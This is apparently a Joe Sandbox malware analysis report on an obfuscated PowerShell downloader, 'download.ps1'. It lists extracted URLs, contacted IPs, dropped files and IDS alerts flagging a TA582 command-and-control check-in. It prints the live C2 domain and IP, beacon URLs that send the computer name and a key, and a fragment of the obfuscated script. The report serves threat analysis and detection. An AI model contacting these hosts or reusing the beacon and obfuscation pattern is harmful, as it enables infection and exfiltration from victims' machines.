00000000.00000002.48209852284.000002C3CCE8C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.48209852284.000002C3CE280000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.48209852284.000002C3CE285000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.48209852284.000002C3CDF62000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.48209852284.000002C3CE295000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.48209852284.000002C3CE28A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.48209852284.000002C3CDF5D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.48209852284.000002C3CDF7A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.48209852284.000002C3CDF76000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.48209852284.000002C3CE2A3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.48209852284.000002C3CDF70000.00000004.00000800.00020000.00000000.sdmpfalse
                        		high
                        https://www.google.com/webhp?tab=wwpowershell.exe, 00000000.00000002.48209852284.000002C3CDBFD000.00000004.00000800.00020000.00000000.sdmpfalse
                          		high
                          https://lh3.googleusercontent.com/ogw/default-user=s96Xzpowershell.exe, 00000000.00000002.48209852284.000002C3CDB8D000.00000004.00000800.00020000.00000000.sdmpfalse
                            		high
                            https://apis.google.comXzpowershell.exe, 00000000.00000002.48209852284.000002C3CD210000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://contoso.com/powershell.exe, 00000000.00000002.48229130309.000002C3DCCD3000.00000004.00000800.00020000.00000000.sdmpfalse
                              		high
                              https://nuget.org/nuget.exepowershell.exe, 00000000.00000002.48229130309.000002C3DCCD3000.00000004.00000800.00020000.00000000.sdmpfalse
                                		high
                                https://www.google.com/finance?tab=wepowershell.exe, 00000000.00000002.48209852284.000002C3CDBFD000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		high
                                  http://maps.google.com/maps?hl=en&tab=wlpowershell.exe, 00000000.00000002.48209852284.000002C3CDBFD000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		high
                                    http://www.google.compowershell.exe, 00000000.00000002.48209852284.000002C3CDBFD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.48209852284.000002C3CCCE8000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		high
                                      https://github.com/Pester/PesterXzpowershell.exe, 00000000.00000002.48209852284.000002C3CD097000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high
                                        http://$xf8o4gnevib316q/$17l8kfj5a4enoxz.php?id=$env:computername&key=$dzthxgyfaewj&s=527powershell.exe, 00000000.00000002.48209852284.000002C3CD210000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        https://apis.google.compowershell.exe, 00000000.00000002.48229130309.000002C3DCE3C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.48229130309.000002C3DCECE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.48229130309.000002C3DCF5C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.48209852284.000002C3CCE8C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.48209852284.000002C3CD097000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.48229130309.000002C3DCC61000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		high
                                          https://ocsp.quovadisoffshore.com0powershell.exe, 00000000.00000002.48209289305.000002C3CCB84000.00000004.00000020.00020000.00000000.sdmpfalse
                                            		high
                                            http://crl.micrpowershell.exe, 00000000.00000002.48235209078.000002C3E4EC6000.00000004.00000020.00020000.00000000.sdmpfalse
                                              		high
                                              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000000.00000002.48209852284.000002C3CCC61000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		high
                                                http://www.blogger.com/?tab=wjpowershell.exe, 00000000.00000002.48209852284.000002C3CDBFD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		high
                                                  http://www.google.com/mobile/?hl=en&tab=wDpowershell.exe, 00000000.00000002.48209852284.000002C3CDBFD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    		high
                                                    https://play.google.com/?hl=en&tab=w8powershell.exe, 00000000.00000002.48209852284.000002C3CDBFD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      		high
                                                      http://kcehmenjdibnmni.toppowershell.exe, 00000000.00000002.48209852284.000002C3CCCE8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://nuget.org/NuGet.exepowershell.exe, 00000000.00000002.48229130309.000002C3DCCD3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        		high
                                                        https://www.google.com/imghp?hl=en&tab=wipowershell.exe, 00000000.00000002.48209852284.000002C3CDBFD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          		high
                                                          https://www.google.com/shopping?hl=en&source=og&tab=wfpowershell.exe, 00000000.00000002.48209852284.000002C3CDBFD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            		high
                                                            https://lh3.googleusercontent.com/ogw/default-user=s96powershell.exe, 00000000.00000002.48229130309.000002C3DCE3C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.48229130309.000002C3DCECE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.48229130309.000002C3DCF5C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.48209852284.000002C3CCE8C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.48209852284.000002C3CE429000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.48209852284.000002C3CD097000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.48229130309.000002C3DCC61000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              		high
                                                              http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000000.00000002.48209852284.000002C3CD097000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                		high
                                                                http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 00000000.00000002.48209852284.000002C3CD210000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000000.00000002.48209852284.000002C3CD097000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    http://www.microsoft.PKI/powershell.exe, 00000000.00000002.48237450709.000002C3E53A9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    		unknown
                                                                    https://drive.google.com/?tab=wopowershell.exe, 00000000.00000002.48209852284.000002C3CDBFD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      https://contoso.com/Iconpowershell.exe, 00000000.00000002.48229130309.000002C3DCCD3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        http://www.microsoft.powershell.exe, 00000000.00000002.48237450709.000002C3E53A9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        • Avira URL Cloud: safe
                                                                        		unknown
                                                                        https://mail.google.com/mail/?tab=wmpowershell.exe, 00000000.00000002.48209852284.000002C3CDBFD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          http://www.google.com/preferences?hl=enpowershell.exe, 00000000.00000002.48209852284.000002C3CDBFD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            https://github.com/Pester/Pesterpowershell.exe, 00000000.00000002.48209852284.000002C3CD097000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              		high
                                                                              https://www.youtube.com/?tab=w1powershell.exe, 00000000.00000002.48209852284.000002C3CDBFD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                		high
                                                                                http://schema.org/WebPageXzpowershell.exe, 00000000.00000002.48209852284.000002C3CD210000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  		high
                                                                                  http://www.apache.org/licenses/LICENSE-2.0.htmlXzpowershell.exe, 00000000.00000002.48209852284.000002C3CD097000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    		high
                                                                                    https://lh3.googleusercontent.com/ogw/default-user=s24powershell.exe, 00000000.00000002.48229130309.000002C3DCC61000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      		high
                                                                                      http://www.google.com/history/optout?hl=enpowershell.exe, 00000000.00000002.48209852284.000002C3CDBFD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        		high
                                                                                        http://www.micft.com/pki/certs/MicWinPCA_2010-07-06.crt0powershell.exe, 00000000.00000002.48235434186.000002C3E5000000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        • Avira URL Cloud: safe
                                                                                        		unknown
                                                                                        https://books.google.com/?hl=en&tab=wppowershell.exe, 00000000.00000002.48209852284.000002C3CDBFD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          		high
                                                                                          https://lh3.googleusercontent.com/ogw/default-user=s24hpowershell.exe, 00000000.00000002.48209852284.000002C3CE2B6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            		high
                                                                                            https://translate.google.com/?hl=en&tab=wTpowershell.exe, 00000000.00000002.48209852284.000002C3CDBFD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              		high
                                                                                              http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000000.00000002.48209852284.000002C3CD210000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                		high
                                                                                                https://lh3.googleusercontent.com/ogw/default-user=s24Xzpowershell.exe, 00000000.00000002.48209852284.000002C3CD210000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  		high
                                                                                                  http://www.quovadis.bm0powershell.exe, 00000000.00000002.48209289305.000002C3CCB84000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                    		high
                                                                                                    https://calendar.google.com/calendar?tab=wcpowershell.exe, 00000000.00000002.48209852284.000002C3CDBFD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                      		high
                                                                                                      https://aka.ms/pscore68powershell.exe, 00000000.00000002.48209852284.000002C3CCC61000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                        		high
                                                                                                        https://www.google.com/images/hpp/YT_RedPlayButton_Icon_48x48.pngpowershell.exe, 00000000.00000002.48209852284.000002C3CDBFD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.48229130309.000002C3DCE3C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.48229130309.000002C3DCECE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.48229130309.000002C3DCF5C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.48209852284.000002C3CCE8C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.48209852284.000002C3CD097000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.48229130309.000002C3DCC61000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                          		high
                                                                                                          http://pesterbdd.com/images/Pester.pngXzpowershell.exe, 00000000.00000002.48209852284.000002C3CD097000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                            		high

                                                                                                            World Map of Contacted IPs

                                                                                                            • No. of IPs < 25%
                                                                                                            • 25% < No. of IPs < 50%
                                                                                                            • 50% < No. of IPs < 75%
                                                                                                            • 75% < No. of IPs

                                                                                                            Public IPs

                                                                                                            IPDomainCountryFlagASNASN NameMalicious
                                                                                                            45.61.136.138
                                                                                                            		kcehmenjdibnmni.topUnited States
                                                                                                            		40676AS40676USfalse
                                                                                                            142.250.191.100
                                                                                                            		www.google.comUnited States
                                                                                                            		15169GOOGLEUSfalse

                                                                                                            General Information

                                                                                                            Joe Sandbox version:41.0.0 Charoite
                                                                                                            Analysis ID:1584476
                                                                                                            Start date and time:2025-01-05 16:28:49 +01:00
                                                                                                            Joe Sandbox product:CloudBasic
                                                                                                            Overall analysis duration:0h 5m 31s
                                                                                                            Hypervisor based Inspection enabled:false
                                                                                                            Report type:full
                                                                                                            Cookbook file name:default.jbs
                                                                                                            Analysis system description:Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, Chrome 128, Firefox 91, Adobe Reader DC 21, Java 8 Update 301
                                                                                                            Run name:Suspected VM Detection
                                                                                                            Number of analysed new started processes analysed:4
                                                                                                            Number of new started drivers analysed:0
                                                                                                            Number of existing processes analysed:0
                                                                                                            Number of existing drivers analysed:0
                                                                                                            Number of injected processes analysed:0
                                                                                                            Technologies:
                                                                                                            • HCA enabled
                                                                                                            • EGA enabled
                                                                                                            • AMSI enabled
                                                                                                            Analysis Mode:default
                                                                                                            Analysis stop reason:Timeout
                                                                                                            Sample name:download.ps1
                                                                                                            Detection:MAL
                                                                                                            Classification:mal72.evad.winPS1@2/7@2/2
                                                                                                            EGA Information:Failed
                                                                                                            HCA Information:Failed
                                                                                                            Cookbook Comments:
                                                                                                            • Found application associated with file extension: .ps1
                                                                                                            • Stop behavior analysis, all processes terminated

                                                                                                            Warnings

                                                                                                            • Exclude process from analysis (whitelisted): dllhost.exe, WmiPrvSE.exe
                                                                                                            • Excluded domains from analysis (whitelisted): ctldl.windowsupdate.com
                                                                                                            • Execution Graph export aborted for target powershell.exe, PID 5816 because it is empty
                                                                                                            • Not all processes where analyzed, report is missing behavior information
                                                                                                            • Report size getting too big, too many NtCreateKey calls found.
                                                                                                            • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                                                                                                            Simulations

                                                                                                            Behavior and APIs

                                                                                                            TimeTypeDescription
                                                                                                            10:31:01API Interceptor28x Sleep call for process: powershell.exe modified

                                                                                                            Joe Sandbox View / Context

                                                                                                            IPs

                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                            45.61.136.138download.ps1Get hashmaliciousUnknownBrowse
                                                                                                            • kcehmenjdibnmni.top/m15teydqhphtr.php?id=computer&key=27186586974&s=527
                                                                                                            download.ps1Get hashmaliciousUnknownBrowse
                                                                                                            • kcehmenjdibnmni.top/trzyoqslw6htr.php?id=user-PC&key=43809224344&s=527
                                                                                                            download.ps1Get hashmaliciousUnknownBrowse
                                                                                                            • kcehmenjdibnmni.top/sce6dujwmhhtr.php?id=computer&key=21283751447&s=527
                                                                                                            download.ps1Get hashmaliciousUnknownBrowse
                                                                                                            • kcehmenjdibnmni.top/hlofm1brkshtr.php?id=user-PC&key=62803468549&s=527
                                                                                                            download.ps1Get hashmaliciousUnknownBrowse
                                                                                                            • kcehmenjdibnmni.top/aoter2umlhhtr.php?id=computer&key=39417889290&s=527
                                                                                                            download.ps1Get hashmaliciousUnknownBrowse
                                                                                                            • kcehmenjdibnmni.top/kqmlncu4i7htr.php?id=user-PC&key=66425560744&s=527
                                                                                                            download.ps1Get hashmaliciousUnknownBrowse
                                                                                                            • kcehmenjdibnmni.top/r2wafo1tlyhtr.php?id=computer&key=85323043609&s=527
                                                                                                            download.ps1Get hashmaliciousUnknownBrowse
                                                                                                            • kcehmenjdibnmni.top/mra3hxz5j7htr.php?id=user-PC&key=48227644320&s=527
                                                                                                            download.ps1Get hashmaliciousUnknownBrowse
                                                                                                            • kdemjgebjimkanl.top/m0lf52z7dihtr.php?id=computer&key=66194449366&s=527

                                                                                                            Domains

                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                            kcehmenjdibnmni.topdownload.ps1Get hashmaliciousUnknownBrowse
                                                                                                            • 45.61.136.138
                                                                                                            download.ps1Get hashmaliciousUnknownBrowse
                                                                                                            • 45.61.136.138
                                                                                                            download.ps1Get hashmaliciousUnknownBrowse
                                                                                                            • 45.61.136.138
                                                                                                            download.ps1Get hashmaliciousUnknownBrowse
                                                                                                            • 45.61.136.138
                                                                                                            download.ps1Get hashmaliciousUnknownBrowse
                                                                                                            • 45.61.136.138
                                                                                                            download.ps1Get hashmaliciousUnknownBrowse
                                                                                                            • 45.61.136.138
                                                                                                            download.ps1Get hashmaliciousUnknownBrowse
                                                                                                            • 45.61.136.138
                                                                                                            download.ps1Get hashmaliciousUnknownBrowse
                                                                                                            • 45.61.136.138

                                                                                                            ASNs

                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                            AS40676USdownload.ps1Get hashmaliciousUnknownBrowse
                                                                                                            • 45.61.136.138
                                                                                                            download.ps1Get hashmaliciousUnknownBrowse
                                                                                                            • 45.61.136.138
                                                                                                            Fantazy.spc.elfGet hashmaliciousUnknownBrowse
                                                                                                            • 41.216.189.243
                                                                                                            armv6l.elfGet hashmaliciousMiraiBrowse
                                                                                                            • 23.179.122.63
                                                                                                            download.ps1Get hashmaliciousUnknownBrowse
                                                                                                            • 45.61.136.138
                                                                                                            download.ps1Get hashmaliciousUnknownBrowse
                                                                                                            • 45.61.136.138
                                                                                                            download.ps1Get hashmaliciousUnknownBrowse
                                                                                                            • 45.61.136.138
                                                                                                            download.ps1Get hashmaliciousUnknownBrowse
                                                                                                            • 45.61.136.138
                                                                                                            EwpsQzeky5.msiGet hashmaliciousUnknownBrowse
                                                                                                            • 193.32.177.34

                                                                                                            JA3 Fingerprints

                                                                                                            No context

                                                                                                            Dropped Files

                                                                                                            No context

                                                                                                            Created / dropped Files

                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                            Download File
                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                            File Type:data
                                                                                                            Category:dropped
                                                                                                            Size (bytes):64
                                                                                                            Entropy (8bit):0.34726597513537405
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:3:Nlll:Nll
                                                                                                            MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                                                                            SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                                                                            SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                                                                            SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                                                                            Malicious:false
                                                                                                            Reputation:high, very likely benign file
                                                                                                            Preview:@...e...........................................................

                                                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1glbp1jo.onr.ps1

                                                                                                            Download File
                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                            Category:dropped
                                                                                                            Size (bytes):60
                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                            Malicious:false
                                                                                                            Reputation:high, very likely benign file
                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5e0xt3fb.yax.ps1

                                                                                                            Download File
                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                            Category:dropped
                                                                                                            Size (bytes):60
                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                            Malicious:false
                                                                                                            Reputation:high, very likely benign file
                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fbnknto2.y3j.psm1

                                                                                                            Download File
                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                            Category:dropped
                                                                                                            Size (bytes):60
                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                            Malicious:false
                                                                                                            Reputation:high, very likely benign file
                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_nrouaat0.kab.psm1

                                                                                                            Download File
                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                            Category:dropped
                                                                                                            Size (bytes):60
                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                            Malicious:false
                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                            C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\0TNPDYFP6J3R5PZF2X2Y.temp

                                                                                                            Download File
                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                            File Type:data
                                                                                                            Category:dropped
                                                                                                            Size (bytes):6222
                                                                                                            Entropy (8bit):3.7491124276857133
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:96:opsPOiin6C2GLX7j2kvhkvCCtVTUlinUt7HTKUlinUwR7HTn:opsPOiiXLLjimliUtbliUwRH
                                                                                                            MD5:668618FB39D5212688D03B1CBB567623
                                                                                                            SHA1:204A917237EADDB91183DDD8324C534E43E3FE45
                                                                                                            SHA-256:802FED05EACE8B2BE832923D95C98B42823A15CDFA5BD2C1F90884024490F528
                                                                                                            SHA-512:0D9F13400B4676E81CE9E537C688143AD7075DCE9FF853D92022D5486990D9CBD6153D3EB6F43166560EBF7CC9189A731F15E90018AF802EFBEE9259137F5AA1
                                                                                                            Malicious:false
                                                                                                            Preview:...................................FL..................F.".. ...;.}.S....I.._..z.:{.............................:..DG..Yr?.D..U..k0.&...&........{.S..._2.._......_......t...CFSF..1....."S...AppData...t.Y^...H.g.3..(.....gVA.G..k...@......"S.%Z.{....B......................A!.A.p.p.D.a.t.a...B.V.1.....%Z.{..Roaming.@......"S.%Z.{....D.....................6'..R.o.a.m.i.n.g.....\.1.....6S.T..MICROS~1..D......"S.%Z.{....E.......................(.M.i.c.r.o.s.o.f.t.....V.1.....%Z.K..Windows.@......"S.%Z.{....F.........................W.i.n.d.o.w.s.......1....."SN...STARTM~1..n.......S)`%Z.K....H...............D.........S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....6S.S..Programs..j.......S)`%Z.K....I...............@.....f...P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1....."S....WINDOW~1..V......"S.%ZdA....J.......................O.W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......"S.%Z.{....i...........

                                                                                                            C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms (copy)

                                                                                                            Download File
                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                            File Type:data
                                                                                                            Category:dropped
                                                                                                            Size (bytes):6222
                                                                                                            Entropy (8bit):3.7491124276857133
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:96:opsPOiin6C2GLX7j2kvhkvCCtVTUlinUt7HTKUlinUwR7HTn:opsPOiiXLLjimliUtbliUwRH
                                                                                                            MD5:668618FB39D5212688D03B1CBB567623
                                                                                                            SHA1:204A917237EADDB91183DDD8324C534E43E3FE45
                                                                                                            SHA-256:802FED05EACE8B2BE832923D95C98B42823A15CDFA5BD2C1F90884024490F528
                                                                                                            SHA-512:0D9F13400B4676E81CE9E537C688143AD7075DCE9FF853D92022D5486990D9CBD6153D3EB6F43166560EBF7CC9189A731F15E90018AF802EFBEE9259137F5AA1
                                                                                                            Malicious:false
                                                                                                            Preview:...................................FL..................F.".. ...;.}.S....I.._..z.:{.............................:..DG..Yr?.D..U..k0.&...&........{.S..._2.._......_......t...CFSF..1....."S...AppData...t.Y^...H.g.3..(.....gVA.G..k...@......"S.%Z.{....B......................A!.A.p.p.D.a.t.a...B.V.1.....%Z.{..Roaming.@......"S.%Z.{....D.....................6'..R.o.a.m.i.n.g.....\.1.....6S.T..MICROS~1..D......"S.%Z.{....E.......................(.M.i.c.r.o.s.o.f.t.....V.1.....%Z.K..Windows.@......"S.%Z.{....F.........................W.i.n.d.o.w.s.......1....."SN...STARTM~1..n.......S)`%Z.K....H...............D.........S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....6S.S..Programs..j.......S)`%Z.K....I...............@.....f...P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1....."S....WINDOW~1..V......"S.%ZdA....J.......................O.W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......"S.%Z.{....i...........

                                                                                                            Static File Info

                                                                                                            General

                                                                                                            File type:ASCII text, with very long lines (10733), with CRLF line terminators
                                                                                                            Entropy (8bit):5.997321814512766
                                                                                                            TrID:
                                                                                                              File name:download.ps1
                                                                                                              File size:19'571 bytes
                                                                                                              MD5:9634cf38abc46be36b46474f183913a7
                                                                                                              SHA1:c07fa000b7acd4fef57a14693dc6639e70d0af2b
                                                                                                              SHA256:64a364c581318226bdeee69fdd6097a2b17599e9eaccea487e01c878424ab7fc
                                                                                                              SHA512:8dcd6468f594e8e77539b7103fc31a6601380dfb1e732cf01b8fb693664ae97f7aaa4ee190e37ee1f117c4f4e09d668b5a889799d0f30d926c97995de6a4753f
                                                                                                              SSDEEP:384:G4naz4b54tfQ5UdCi0I3fwHJJOeqeNyNYbhyqGvmTc:G4naz4V4t58Q3fwHfOengyyq5c
                                                                                                              TLSH:55927C6477CED9E2C1C9813D1D02BC187A23B16BE0EB2DC0FAADD5C233696556A58FC1
                                                                                                              File Content Preview:$dknchztum=$executioncontext;$edisataltiononbeorerisanatan = -join (0..54 | ForEach-Object {[char]([int]"000000850000008400000089000000820000008800000086000000880000008700000087000000820000008800000080000000810000008700000084000000880000008600000088000000

                                                                                                              File Icon

                                                                                                              Icon Hash:3270d6baae77db44

                                                                                                              Network Behavior

                                                                                                              Suricata IDS Alerts

                                                                                                              TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                              2025-01-05T16:31:03.413660+01002859488ETPRO MALWARE TA582 Domain in DNS Lookup1192.168.11.20496581.1.1.153UDP
                                                                                                              2025-01-05T16:31:04.288233+01001810000Joe Security ANOMALY Windows PowerShell HTTP activity2192.168.11.204975145.61.136.13880TCP
                                                                                                              2025-01-05T16:31:04.288233+01002057741ET MALWARE TA582 CnC Checkin1192.168.11.204975145.61.136.13880TCP
                                                                                                              2025-01-05T16:31:04.664456+01001810000Joe Security ANOMALY Windows PowerShell HTTP activity2192.168.11.2049752142.250.191.10080TCP

                                                                                                              Network Port Distribution

                                                                                                              TCP Packets

                                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                                              Jan 5, 2025 16:31:03.861694098 CET4975180192.168.11.2045.61.136.138
                                                                                                              Jan 5, 2025 16:31:04.033235073 CET804975145.61.136.138192.168.11.20
                                                                                                              Jan 5, 2025 16:31:04.033466101 CET4975180192.168.11.2045.61.136.138
